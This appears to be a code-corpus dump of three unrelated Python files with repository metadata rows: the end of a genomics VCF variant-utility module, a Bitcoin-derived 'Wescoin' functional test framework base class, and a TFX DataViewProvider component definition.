Returns:
A tuple, one for each allele in alleles in order, with any common postfix
bases stripped off.
"""
def all_the_same(items):
first = next(items)
return all(item == first for item in items)
# Loop over the alleles to determine the length of the shared postfix. Start
# at 1 so every allele, even after trimming the postfix, has at least len 1.
# For example, alleles = ['ATT', 'TT'] reduces to ['AT', 'T'] not ['A', ''].
shortest_allele_len = min(len(a) for a in alleles)
common_postfix_len = 0
for i in range(1, shortest_allele_len):
if not all_the_same(a[-i] for a in alleles):
break
common_postfix_len = i
if common_postfix_len:
return tuple(a[0:-common_postfix_len] for a in alleles)
else:
# Fast path for the case where there's no shared postfix.
return alleles
def is_filtered(variant):
"""Returns True if variant has a non-PASS filter field, or False otherwise."""
return bool(variant.filter) and any(
f not in {'PASS', '.'} for f in variant.filter)
def is_variant_call(variant,
require_non_ref_genotype=True,
no_calls_are_variant=False):
"""Is variant a non-reference call?
A Variant proto doesn't always imply that there's a variant present in the
genome. The call may not have alternate bases, may be filtered, may a have
hom-ref genotype, etc. This function looks for all of those configurations
and returns true iff the variant is asserting that a mutation is present
in the same.
Note that this code allows a variant without a calls field to be variant,
but one with a genotype call must have a non-reference genotype to be
considered variant (if require_non_ref_genotype is True, the default). If
False, a variant that passes all fo the site-level requirements for being
a variant_call will return a True value, regardless of the genotypes, which
means that we'll consider a site with a sample with a hom-ref or no-call site
a variant call.
Args:
variant: third_party.nucleus.protos.Variant.
require_non_ref_genotype: Should we require a site with a genotype call to
have a non-reference (het, hom-var) genotype for the site to be considered
a variant call?
no_calls_are_variant: If a site has genotypes, should we consider no_call
genotypes as being variant or not?
Returns:
True if variant is really a mutation call.
Raises:
ValueError: If variant has more than one call (i.e., is multi-sample).
"""
if not variant.alternate_bases:
return False
elif is_filtered(variant):
return False
elif not variant.calls or not require_non_ref_genotype:
return True
# All tests after this point should only look at genotype-based fields, as
# we may have aborted out in the prev. line due to require_non_ref_genotype.
elif len(variant.calls) > 1:
raise ValueError('Unsupported: multiple genotypes found at', variant)
elif any(g > 0 for g in variant.calls[0].genotype):
return True
elif no_calls_are_variant:
return all(g == -1 for g in variant.calls[0].genotype)
else:
return False
def has_genotypes(variant):
"""Does variant have genotype calls?
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
True if variant has genotype calls.
"""
# I don't want to return the actual data structure so I'm doing the
# explicit True/False evaluation here.
# pylint: disable=g-explicit-length-test
return len(variant.calls) > 0
def genotype_type(variant):
"""Gets the GenotypeType for variant.
If variant doesn't have genotypes, returns no_call. Otherwise
returns one of no_call, hom_ref, het, or hom_var depending on the
status of the genotypes in the call field of variant.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A GenotypeType.
Raises:
ValueError: If variant has more than one call (i.e., is multi-sample).
"""
if not has_genotypes(variant):
return GenotypeType.no_call
elif len(variant.calls) > 1:
raise ValueError('Unsupported: multiple genotypes found at', variant)
else:
gt = set(variant.calls[0].genotype)
if gt == {-1}:
return GenotypeType.no_call
elif gt == {0}:
return GenotypeType.hom_ref
elif len(gt) > 1:
return GenotypeType.het
else:
return GenotypeType.hom_var
def genotype_as_alleles(variant):
"""Gets genotype of the sample in variant as a list of actual alleles.
Returns the alleles specified by the genotype indices of variant.calls[0].
For example, if variant.reference_bases = 'A' and variant.alternative_bases
= ['C'] and the genotypes are [0, 1], this function will return
['A', 'C'].
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A list of allele (string) from variant, one for each genotype in
variant.calls[0], in order.
Raises:
ValueError: If variant doesn't have genotypes.
ValueError: If variant has more than one call (i.e., is multi-sample).
"""
if not has_genotypes(variant):
raise ValueError('Not genotypes present in', variant)
elif len(variant.calls) > 1:
raise ValueError('Unsupported: multiple genotypes found at', variant)
else:
# Genotypes are encoded as integers, where 0 is the reference allele,
# indices > 0 refer to alt alleles, and the no-call genotypes is encoded
# as -1 in the genotypes. This code relies on this encoding to quickly
# reference into the alleles by adding 1 to the genotype index.
alleles = ['.', variant.reference_bases] + list(variant.alternate_bases)
return [alleles[i + 1] for i in variant.calls[0].genotype]
def genotype_quality(variant, default=None):
"""Gets the genotype quality (GQ) value the genotype call in variant.
If variant doesn't have genotypes, returns default, otherwise tries
to retrieve the GQ field of the call field, returning that value if
present otherwise returning default if its absent.
Args:
variant: third_party.nucleus.protos.Variant.
default: The value for GQ to return if variant has no genotypes or
if GQ is present in the genotype call record.
Returns:
The GQ value (may be a string or whatever value default is).
"""
if not has_genotypes(variant):
return default
call = variant.calls[0]
if 'GQ' in call.info:
return call.info['GQ'].values[0].number_value
else:
return default
def is_gvcf(variant):
"""Returns true if variant encodes a standard gVCF reference block.
This means in practice that variant has a single alternate allele that is the
canonical gVCF allele GVCF_ALT_ALLELE constant exported here.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
Boolean. True if variant is a gVCF record, False otherwise.
"""
return variant.alternate_bases == [GVCF_ALT_ALLELE]
def _genotype_order_in_likelihoods(num_alts, ploidy=2):
"""Yields tuples of `ploidy` ints for the given number of alt alleles.
https://samtools.github.io/hts-specs/VCFv4.1.pdf
"If A is the allele in REF and B,C,... are the alleles as ordered in ALT,
the ordering of genotypes for the likelihoods is given by:
F(j/k) = (k*(k+1)/2)+j. In other words, for biallelic sites the ordering is:
AA,AB,BB; for triallelic sites the ordering is: AA,AB,BB,AC,BC,CC, etc."
The biallelic sites in our case are 0/0, 0/1, 1/1.
The triallelic sites are 0/0, 0/1, 1/1, 0/2, 1/2, 2/2.
This wiki page has more information that generalizes to different ploidy.
http://genome.sph.umich.edu/wiki/Relationship_between_Ploidy,_Alleles_and_Genotypes
Args:
num_alts: int. The number of alternate alleles at the site.
ploidy: int. The ploidy for which to return genotypes.
Yields:
Tuples of `ploidy` ints representing allele indices in the order they appear
in the corresponding genotype likelihood array.
"""
if ploidy == 1:
for i in range(num_alts + 1):
yield (i,)
elif ploidy == 2:
for j in range(num_alts + 1):
for i in range(j + 1):
yield (i, j)
else:
raise NotImplementedError('Only haploid and diploid supported.')
def genotype_ordering_in_likelihoods(variant):
"""Yields (i, j, allele_i, allele_j) for the genotypes ordering in GLs.
https://samtools.github.io/hts-specs/VCFv4.1.pdf
"If A is the allele in REF and B,C,... are the alleles as ordered in ALT,
the ordering of genotypes for the likelihoods is given by:
F(j/k) = (k*(k+1)/2)+j. In other words, for biallelic sites the ordering is:
AA,AB,BB; for triallelic sites the ordering is: AA,AB,BB,AC,BC,CC, etc."
The biallelic sites in our case are 0/0, 0/1, 1/1.
The triallelic sites are 0/0, 0/1, 1/1, 0/2, 1/2, 2/2.
This wiki page has more information that generalizes ot different ploidy.
http://genome.sph.umich.edu/wiki/Relationship_between_Ploidy,_Alleles_and_Genotypes
Currently this function only implements for diploid cases.
Args:
variant: third_party.nucleus.protos.Variant.
Yields:
allele indices and strings (i, j, allele_i, allele_j) in the correct order.
"""
alleles = [variant.reference_bases] + list(variant.alternate_bases)
for i, j in _genotype_order_in_likelihoods(
len(variant.alternate_bases), ploidy=2):
yield i, j, alleles[i], alleles[j]
def genotype_likelihood_index(allele_indices):
"""Returns the genotype likelihood index for the given allele indices.
Args:
allele_indices: list(int). The list of allele indices for a given genotype.
E.g. diploid homozygous reference is represented as [0, 0].
Returns:
The index into the associated genotype likelihood array corresponding to
the likelihood of this list of alleles.
Raises:
NotImplementedError: The allele_indices are more than diploid.
"""
if len(allele_indices) == 1:
# Haploid case.
return allele_indices[0]
elif len(allele_indices) == 2:
# Diploid case.
g1, g2 = sorted(allele_indices)
return g1 + (g2 * (g2 + 1) // 2)
else:
raise NotImplementedError(
'Genotype likelihood index only supports haploid and diploid: {}'.
format(allele_indices))
def allele_indices_for_genotype_likelihood_index(gl_index, ploidy=2):
"""Returns a tuple of allele_indices corresponding to the given GL index.
This is the inverse function to `genotype_likelihood_index`.
Args:
gl_index: int. The index within a genotype likelihood array for which to
determine the associated alleles.
ploidy: int. The ploidy of the result.
Returns:
A tuple of `ploidy` ints representing the allele indices at this GL index.
Raises:
NotImplementedError: The requested allele indices are more than diploid.
"""
if ploidy == 1:
return gl_index
elif ploidy == 2:
# redacted
# https://genome.sph.umich.edu/wiki/Relationship_between_Ploidy,_Alleles_and_Genotypes
# rather than creating all genotypes explicitly.
num_alts = 1
while genotype_likelihood_index([num_alts, num_alts]) < gl_index:
num_alts += 1
genotypes = list(_genotype_order_in_likelihoods(num_alts, ploidy=ploidy))
return genotypes[gl_index]
else:
raise NotImplementedError(
'Allele calculations only supported for haploid and diploid.')
def genotype_likelihood(variantcall, allele_indices):
"""Returns the genotype likelihood for the given allele indices.
Args:
variantcall: third_party.nucleus.protos.VariantCall. The VariantCall from
which to extract the genotype likelihood of the allele indices.
allele_indices: list(int). The list of allele indices for a given genotype.
E.g. diploid heterozygous alternate can be represented as [0, 1].
Returns:
The float value of the genotype likelihood of this set of alleles.
"""
return variantcall.genotype_likelihood[genotype_likelihood_index(
allele_indices)]
def allele_indices_with_num_alts(variant, num_alts, ploidy=2):
"""Returns a list of allele indices configurations with `num_alts` alternates.
Args:
variant: third_party.nucleus.protos.Variant. The variant of interest, which
defines the candidate alternate alleles that can be used to generate
allele indices configurations.
num_alts: int in [0, `ploidy`]. The number of non-reference alleles for
which to create the allele indices configurations.
ploidy: int. The ploidy for which to return allele indices configurations.
Returns: A list of tuples. Each tuple is of length `ploidy` and represents the
allele indices of all `ploidy` genotypes that contain `num_alts`
non-reference alleles.
Raises:
ValueError: The domain of `num_alts` is invalid.
NotImplementedError: `ploidy` is not diploid.
"""
if ploidy != 2:
raise NotImplementedError(
'allele_indices_with_num_alts only supports diploid.')
if not 0 <= num_alts <= ploidy:
raise ValueError(
'Invalid number of alternate alleles requested: {} for ploidy {}'.
format(num_alts, ploidy))
max_candidate_alt_ix = len(variant.alternate_bases)
if num_alts == 0:
return [(0, 0)]
elif num_alts == 1:
return [(0, i) for i in range(1, max_candidate_alt_ix + 1)]
else:
return [(i, j)
for i in range(1, max_candidate_alt_ix + 1)
for j in range(i, max_candidate_alt_ix + 1)]
| 33.025094 | 90 | 0.71859 |
acf693c35d3ebf7426916e46aa993fb01a7122c7 | 22,830 | py | Python | test/functional/test_framework/test_framework.py | ahamium/WESCOIN | a15d64caa24dec050f997fe2031d518ee1d76836 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_framework.py | ahamium/WESCOIN | a15d64caa24dec050f997fe2031d518ee1d76836 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_framework.py | ahamium/WESCOIN | a15d64caa24dec050f997fe2031d518ee1d76836 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
import configparser
from enum import Enum
import logging
import argparse
import os
import pdb
import shutil
import sys
import tempfile
import time
from .authproxy import JSONRPCException
from . import coverage
from .test_node import TestNode
from .mininode import NetworkThread
from .util import (
MAX_NODES,
PortSeed,
assert_equal,
check_json_precision,
connect_nodes_bi,
disconnect_nodes,
get_datadir_path,
initialize_datadir,
p2p_port,
set_node_times,
sync_blocks,
sync_mempools,
)
class TestStatus(Enum):
PASSED = 1
FAILED = 2
SKIPPED = 3
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
class SkipTest(Exception):
"""This exception is raised to skip a test"""
def __init__(self, message):
self.message = message
class WescoinTestMetaClass(type):
"""Metaclass for WescoinTestFramework.
Ensures that any attempt to register a subclass of `WescoinTestFramework`
adheres to a standard whereby the subclass overrides `set_test_params` and
`run_test` but DOES NOT override either `__init__` or `main`. If any of
those standards are violated, a ``TypeError`` is raised."""
def __new__(cls, clsname, bases, dct):
if not clsname == 'WescoinTestFramework':
if not ('run_test' in dct and 'set_test_params' in dct):
raise TypeError("WescoinTestFramework subclasses must override "
"'run_test' and 'set_test_params'")
if '__init__' in dct or 'main' in dct:
raise TypeError("WescoinTestFramework subclasses may not override "
"'__init__' or 'main'")
return super().__new__(cls, clsname, bases, dct)
class WescoinTestFramework(metaclass=WescoinTestMetaClass):
"""Base class for a wescoin test script.
Individual wescoin test scripts should subclass this class and override the set_test_params() and run_test() methods.
Individual tests can also override the following methods to customize the test setup:
- add_options()
- setup_chain()
- setup_network()
- setup_nodes()
The __init__() and main() methods should not be overridden.
This class also contains various public and private helper methods."""
def __init__(self):
"""Sets test framework defaults. Do not override this method. Instead, override the set_test_params() method"""
self.setup_clean_chain = False
self.nodes = []
self.network_thread = None
self.mocktime = 0
self.rpc_timewait = 60 # Wait for up to 60 seconds for the RPC server to respond
self.supports_cli = False
self.bind_to_localhost_only = True
self.set_test_params()
assert hasattr(self, "num_nodes"), "Test must set self.num_nodes in set_test_params()"
def main(self):
"""Main function. This should not be overridden by the subclass test scripts."""
parser = argparse.ArgumentParser(usage="%(prog)s [options]")
parser.add_argument("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave wescoinds and test.* datadir on exit or error")
parser.add_argument("--noshutdown", dest="noshutdown", default=False, action="store_true",
help="Don't stop wescoinds after the test execution")
parser.add_argument("--cachedir", dest="cachedir", default=os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../cache"),
help="Directory for caching pregenerated datadirs (default: %(default)s)")
parser.add_argument("--tmpdir", dest="tmpdir", help="Root directory for datadirs")
parser.add_argument("-l", "--loglevel", dest="loglevel", default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
parser.add_argument("--tracerpc", dest="trace_rpc", default=False, action="store_true",
help="Print out all RPC calls as they are made")
parser.add_argument("--portseed", dest="port_seed", default=os.getpid(), type=int,
help="The seed to use for assigning port numbers (default: current process id)")
parser.add_argument("--coveragedir", dest="coveragedir",
help="Write tested RPC commands into this directory")
parser.add_argument("--configfile", dest="configfile",
default=os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../config.ini"),
help="Location of the test framework config file (default: %(default)s)")
parser.add_argument("--pdbonfailure", dest="pdbonfailure", default=False, action="store_true",
help="Attach a python debugger if test fails")
parser.add_argument("--usecli", dest="usecli", default=False, action="store_true",
help="use wescoin-cli instead of RPC for all commands")
self.add_options(parser)
self.options = parser.parse_args()
PortSeed.n = self.options.port_seed
check_json_precision()
self.options.cachedir = os.path.abspath(self.options.cachedir)
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile))
self.options.wescoind = os.getenv("WESCOIND", default=config["environment"]["BUILDDIR"] + '/src/wescoind' + config["environment"]["EXEEXT"])
self.options.wescoincli = os.getenv("WESCOINCLI", default=config["environment"]["BUILDDIR"] + '/src/wescoin-cli' + config["environment"]["EXEEXT"])
os.environ['PATH'] = os.pathsep.join([
os.path.join(config['environment']['BUILDDIR'], 'src'),
os.path.join(config['environment']['BUILDDIR'], 'src', 'qt'),
os.environ['PATH']
])
# Set up temp directory and start logging
if self.options.tmpdir:
self.options.tmpdir = os.path.abspath(self.options.tmpdir)
os.makedirs(self.options.tmpdir, exist_ok=False)
else:
self.options.tmpdir = tempfile.mkdtemp(prefix="test")
self._start_logging()
self.log.debug('Setting up network thread')
self.network_thread = NetworkThread()
self.network_thread.start()
success = TestStatus.FAILED
try:
if self.options.usecli and not self.supports_cli:
raise SkipTest("--usecli specified but test does not support using CLI")
self.skip_test_if_missing_module()
self.setup_chain()
self.setup_network()
self.import_deterministic_coinbase_privkeys()
self.run_test()
success = TestStatus.PASSED
except JSONRPCException as e:
self.log.exception("JSONRPC error")
except SkipTest as e:
self.log.warning("Test Skipped: %s" % e.message)
success = TestStatus.SKIPPED
except AssertionError as e:
self.log.exception("Assertion failed")
except KeyError as e:
self.log.exception("Key error")
except Exception as e:
self.log.exception("Unexpected exception caught during testing")
except KeyboardInterrupt as e:
self.log.warning("Exiting after keyboard interrupt")
if success == TestStatus.FAILED and self.options.pdbonfailure:
print("Testcase failed. Attaching python debugger. Enter ? for help")
pdb.set_trace()
self.log.debug('Closing down network thread')
self.network_thread.close()
if not self.options.noshutdown:
self.log.info("Stopping nodes")
if self.nodes:
self.stop_nodes()
else:
for node in self.nodes:
node.cleanup_on_exit = False
self.log.info("Note: wescoinds were not stopped and may still be running")
if not self.options.nocleanup and not self.options.noshutdown and success != TestStatus.FAILED:
self.log.info("Cleaning up {} on exit".format(self.options.tmpdir))
cleanup_tree_on_exit = True
else:
self.log.warning("Not cleaning up dir %s" % self.options.tmpdir)
cleanup_tree_on_exit = False
if success == TestStatus.PASSED:
self.log.info("Tests successful")
exit_code = TEST_EXIT_PASSED
elif success == TestStatus.SKIPPED:
self.log.info("Test skipped")
exit_code = TEST_EXIT_SKIPPED
else:
self.log.error("Test failed. Test logging available at %s/test_framework.log", self.options.tmpdir)
self.log.error("Hint: Call {} '{}' to consolidate all logs".format(os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../combine_logs.py"), self.options.tmpdir))
exit_code = TEST_EXIT_FAILED
logging.shutdown()
if cleanup_tree_on_exit:
shutil.rmtree(self.options.tmpdir)
sys.exit(exit_code)
# Methods to override in subclass test scripts.
def set_test_params(self):
"""Tests must this method to change default values for number of nodes, topology, etc"""
raise NotImplementedError
def add_options(self, parser):
"""Override this method to add command-line options to the test"""
pass
def skip_test_if_missing_module(self):
"""Override this method to skip a test if a module is not compiled"""
pass
def setup_chain(self):
"""Override this method to customize blockchain setup"""
self.log.info("Initializing test directory " + self.options.tmpdir)
if self.setup_clean_chain:
self._initialize_chain_clean()
else:
self._initialize_chain()
def setup_network(self):
"""Override this method to customize test network topology"""
self.setup_nodes()
# Connect the nodes as a "chain". This allows us
# to split the network between nodes 1 and 2 to get
# two halves that can work on competing chains.
for i in range(self.num_nodes - 1):
connect_nodes_bi(self.nodes, i, i + 1)
self.sync_all()
def setup_nodes(self):
"""Override this method to customize test node setup"""
extra_args = None
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args)
self.start_nodes()
def import_deterministic_coinbase_privkeys(self):
if self.setup_clean_chain:
return
for n in self.nodes:
try:
n.getwalletinfo()
except JSONRPCException as e:
assert str(e).startswith('Method not found')
continue
n.importprivkey(n.get_deterministic_priv_key()[1])
def run_test(self):
"""Tests must override this method to define test logic"""
raise NotImplementedError
# Public helper methods. These can be accessed by the subclass test scripts.
def add_nodes(self, num_nodes, extra_args=None, *, rpchost=None, binary=None):
"""Instantiate TestNode objects"""
if self.bind_to_localhost_only:
extra_confs = [["bind=127.0.0.1"]] * num_nodes
else:
extra_confs = [[]] * num_nodes
if extra_args is None:
extra_args = [[]] * num_nodes
if binary is None:
binary = [self.options.wescoind] * num_nodes
assert_equal(len(extra_confs), num_nodes)
assert_equal(len(extra_args), num_nodes)
assert_equal(len(binary), num_nodes)
for i in range(num_nodes):
self.nodes.append(TestNode(i, get_datadir_path(self.options.tmpdir, i), rpchost=rpchost, timewait=self.rpc_timewait, wescoind=binary[i], wescoin_cli=self.options.wescoincli, mocktime=self.mocktime, coverage_dir=self.options.coveragedir, extra_conf=extra_confs[i], extra_args=extra_args[i], use_cli=self.options.usecli))
def start_node(self, i, *args, **kwargs):
"""Start a wescoind"""
node = self.nodes[i]
node.start(*args, **kwargs)
node.wait_for_rpc_connection()
if self.options.coveragedir is not None:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def start_nodes(self, extra_args=None, *args, **kwargs):
"""Start multiple wescoinds"""
if extra_args is None:
extra_args = [None] * self.num_nodes
assert_equal(len(extra_args), self.num_nodes)
try:
for i, node in enumerate(self.nodes):
node.start(extra_args[i], *args, **kwargs)
for node in self.nodes:
node.wait_for_rpc_connection()
except:
# If one node failed to start, stop the others
self.stop_nodes()
raise
if self.options.coveragedir is not None:
for node in self.nodes:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def stop_node(self, i, expected_stderr=''):
"""Stop a wescoind test node"""
self.nodes[i].stop_node(expected_stderr)
self.nodes[i].wait_until_stopped()
def stop_nodes(self):
"""Stop multiple wescoind test nodes"""
for node in self.nodes:
# Issue RPC to stop nodes
node.stop_node()
for node in self.nodes:
# Wait for nodes to stop
node.wait_until_stopped()
def restart_node(self, i, extra_args=None):
"""Stop and start a test node"""
self.stop_node(i)
self.start_node(i, extra_args)
def wait_for_node_exit(self, i, timeout):
self.nodes[i].process.wait(timeout)
def split_network(self):
"""
Split the network of four nodes into nodes 0/1 and 2/3.
"""
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
self.sync_all([self.nodes[:2], self.nodes[2:]])
def join_network(self):
"""
Join the (previously split) network halves together.
"""
connect_nodes_bi(self.nodes, 1, 2)
self.sync_all()
def sync_all(self, node_groups=None):
if not node_groups:
node_groups = [self.nodes]
for group in node_groups:
sync_blocks(group)
sync_mempools(group)
def enable_mocktime(self):
"""Enable mocktime for the script.
mocktime may be needed for scripts that use the cached version of the
blockchain. If the cached version of the blockchain is used without
mocktime then the mempools will not sync due to IBD.
For backward compatibility of the python scripts with previous
versions of the cache, this helper function sets mocktime to Jan 1,
2014 + (201 * 10 * 60)"""
self.mocktime = 1388534400 + (201 * 10 * 60)
def disable_mocktime(self):
self.mocktime = 0
# Private helper methods. These should not be accessed by the subclass test scripts.
def _start_logging(self):
# Add logger and logging handlers
self.log = logging.getLogger('TestFramework')
self.log.setLevel(logging.DEBUG)
# Create file handler to log all messages
fh = logging.FileHandler(self.options.tmpdir + '/test_framework.log', encoding='utf-8')
fh.setLevel(logging.DEBUG)
# Create console handler to log messages to stderr. By default this logs only error messages, but can be configured with --loglevel.
ch = logging.StreamHandler(sys.stdout)
# User can provide log level as a number or string (eg DEBUG). loglevel was caught as a string, so try to convert it to an int
ll = int(self.options.loglevel) if self.options.loglevel.isdigit() else self.options.loglevel.upper()
ch.setLevel(ll)
# Format logs the same as wescoind's debug.log with microprecision (so log files can be concatenated and sorted)
formatter = logging.Formatter(fmt='%(asctime)s.%(msecs)03d000Z %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%dT%H:%M:%S')
formatter.converter = time.gmtime
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
self.log.addHandler(fh)
self.log.addHandler(ch)
if self.options.trace_rpc:
rpc_logger = logging.getLogger("WescoinRPC")
rpc_logger.setLevel(logging.DEBUG)
rpc_handler = logging.StreamHandler(sys.stdout)
rpc_handler.setLevel(logging.DEBUG)
rpc_logger.addHandler(rpc_handler)
def _initialize_chain(self):
"""Initialize a pre-mined blockchain for use by the test.
Create a cache of a 200-block-long chain (with wallet) for MAX_NODES
Afterward, create num_nodes copies from the cache."""
assert self.num_nodes <= MAX_NODES
create_cache = False
for i in range(MAX_NODES):
if not os.path.isdir(get_datadir_path(self.options.cachedir, i)):
create_cache = True
break
if create_cache:
self.log.debug("Creating data directories from cached datadir")
# find and delete old cache directories if any exist
for i in range(MAX_NODES):
if os.path.isdir(get_datadir_path(self.options.cachedir, i)):
shutil.rmtree(get_datadir_path(self.options.cachedir, i))
# Create cache directories, run wescoinds:
for i in range(MAX_NODES):
datadir = initialize_datadir(self.options.cachedir, i)
args = [self.options.wescoind, "-datadir=" + datadir, '-disablewallet']
if i > 0:
args.append("-connect=127.0.0.1:" + str(p2p_port(0)))
self.nodes.append(TestNode(i, get_datadir_path(self.options.cachedir, i), extra_conf=["bind=127.0.0.1"], extra_args=[], rpchost=None, timewait=self.rpc_timewait, wescoind=self.options.wescoind, wescoin_cli=self.options.wescoincli, mocktime=self.mocktime, coverage_dir=None))
self.nodes[i].args = args
self.start_node(i)
# Wait for RPC connections to be ready
for node in self.nodes:
node.wait_for_rpc_connection()
# Create a 200-block-long chain; each of the 4 first nodes
# gets 25 mature blocks and 25 immature.
# Note: To preserve compatibility with older versions of
# initialize_chain, only 4 nodes will generate coins.
#
# blocks are created with timestamps 10 minutes apart
# starting from 2010 minutes in the past
self.enable_mocktime()
block_time = self.mocktime - (201 * 10 * 60)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(self.nodes, block_time)
self.nodes[peer].generatetoaddress(1, self.nodes[peer].get_deterministic_priv_key()[0])
block_time += 10 * 60
# Must sync before next peer starts generating blocks
sync_blocks(self.nodes)
# Shut them down, and clean up cache directories:
self.stop_nodes()
self.nodes = []
self.disable_mocktime()
def cache_path(n, *paths):
return os.path.join(get_datadir_path(self.options.cachedir, n), "regtest", *paths)
for i in range(MAX_NODES):
os.rmdir(cache_path(i, 'wallets')) # Remove empty wallets dir
for entry in os.listdir(cache_path(i)):
if entry not in ['chainstate', 'blocks']:
os.remove(cache_path(i, entry))
for i in range(self.num_nodes):
from_dir = get_datadir_path(self.options.cachedir, i)
to_dir = get_datadir_path(self.options.tmpdir, i)
shutil.copytree(from_dir, to_dir)
initialize_datadir(self.options.tmpdir, i) # Overwrite port/rpcport in wescoin.conf
def _initialize_chain_clean(self):
"""Initialize empty blockchain for use by the test.
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization."""
for i in range(self.num_nodes):
initialize_datadir(self.options.tmpdir, i)
def skip_if_no_py3_zmq(self):
"""Attempt to import the zmq package and skip the test if the import fails."""
try:
import zmq # noqa
except ImportError:
raise SkipTest("python3-zmq module not available.")
def skip_if_no_wescoind_zmq(self):
"""Skip the running test if wescoind has not been compiled with zmq support."""
if not self.is_zmq_compiled():
raise SkipTest("wescoind has not been built with zmq enabled.")
def skip_if_no_wallet(self):
"""Skip the running test if wallet has not been compiled."""
if not self.is_wallet_compiled():
raise SkipTest("wallet has not been compiled.")
def skip_if_no_cli(self):
"""Skip the running test if wescoin-cli has not been compiled."""
if not self.is_cli_compiled():
raise SkipTest("wescoin-cli has not been compiled.")
def is_cli_compiled(self):
"""Checks whether wescoin-cli was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile))
return config["components"].getboolean("ENABLE_UTILS")
def is_wallet_compiled(self):
"""Checks whether the wallet module was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile))
return config["components"].getboolean("ENABLE_WALLET")
def is_zmq_compiled(self):
"""Checks whether the zmq module was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile))
return config["components"].getboolean("ENABLE_ZMQ")
| 42.044199 | 331 | 0.63329 |
acf693e0f26d3441c42022027128db013ad118af | 3,494 | py | Python | tfx/components/experimental/data_view/provider_component.py | TimoKerr/tfx | 10d13d57eeac21514fed73118cb43464dada67f1 | [
"Apache-2.0"
] | 1 | 2021-05-10T10:41:06.000Z | 2021-05-10T10:41:06.000Z | tfx/components/experimental/data_view/provider_component.py | TimoKerr/tfx | 10d13d57eeac21514fed73118cb43464dada67f1 | [
"Apache-2.0"
] | null | null | null | tfx/components/experimental/data_view/provider_component.py | TimoKerr/tfx | 10d13d57eeac21514fed73118cb43464dada67f1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TFX DataViewProvider component definition."""
from typing import Optional, Text
from tfx import types
from tfx.components.experimental.data_view import provider_executor
from tfx.dsl.components.base import base_component
from tfx.dsl.components.base import executor_spec
from tfx.types import standard_artifacts
from tfx.types.component_spec import ChannelParameter
from tfx.types.component_spec import ComponentSpec
from tfx.types.component_spec import ExecutionParameter
class _TfGraphDataViewProviderSpec(ComponentSpec):
"""DataViewProvider component spec."""
PARAMETERS = {
'module_file': ExecutionParameter(type=(str, Text), optional=True),
'create_decoder_func': ExecutionParameter(type=(str, Text))
}
INPUTS = {}
OUTPUTS = {
'data_view': ChannelParameter(type=standard_artifacts.DataView),
}
class TfGraphDataViewProvider(base_component.BaseComponent):
"""A component providing a tfx_bsl.coders.TfGraphRecordDecoder as a DataView.
User needs to define a function that creates such a TfGraphRecordDecoder. This
component, when running, calls that function and writes the result decoder
(in the form of a TF SavedModel) as its output artifact.
Example:
```
# Import a decoder that can be created by a function 'create_decoder()' in
# module_file:
data_view_provider = TfGraphDataViewProvider(
module_file=module_file,
create_decoder_func='create_decoder')
```
"""
SPEC_CLASS = _TfGraphDataViewProviderSpec
EXECUTOR_SPEC = executor_spec.ExecutorClassSpec(
provider_executor.TfGraphDataViewProviderExecutor)
def __init__(self,
create_decoder_func: Text,
module_file: Optional[Text] = None,
data_view: Optional[types.Channel] = None):
"""Construct a StatisticsGen component.
Args:
create_decoder_func: If `module_file` is not None, this should be the name
of the function in `module_file` that this component need to use to
create the TfGraphRecordDecoder. Otherwise it should be the path
(dot-delimited, e.g. "some_package.some_module.some_func") to such
a function. The function must have the following signature:
def create_decoder_func() -> tfx_bsl.coder.TfGraphRecordDecoder:
...
module_file: The file path to a python module file, from which the
function named after `create_decoder_func` will be loaded. If not
provided, `create_decoder_func` is expected to be a path to a function.
data_view: Output 'DataView' channel, in which a the decoder will be
saved.
"""
if data_view is None:
data_view = types.Channel(type=standard_artifacts.DataView)
spec = _TfGraphDataViewProviderSpec(
module_file=module_file,
create_decoder_func=create_decoder_func,
data_view=data_view)
super().__init__(spec=spec)
| 39.258427 | 80 | 0.740985 |
acf69592d80507bba0d511163933e7f4a769c0b7 | 9,064 | py | Python | official/cv/c3d/src/tools/dataset_preprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
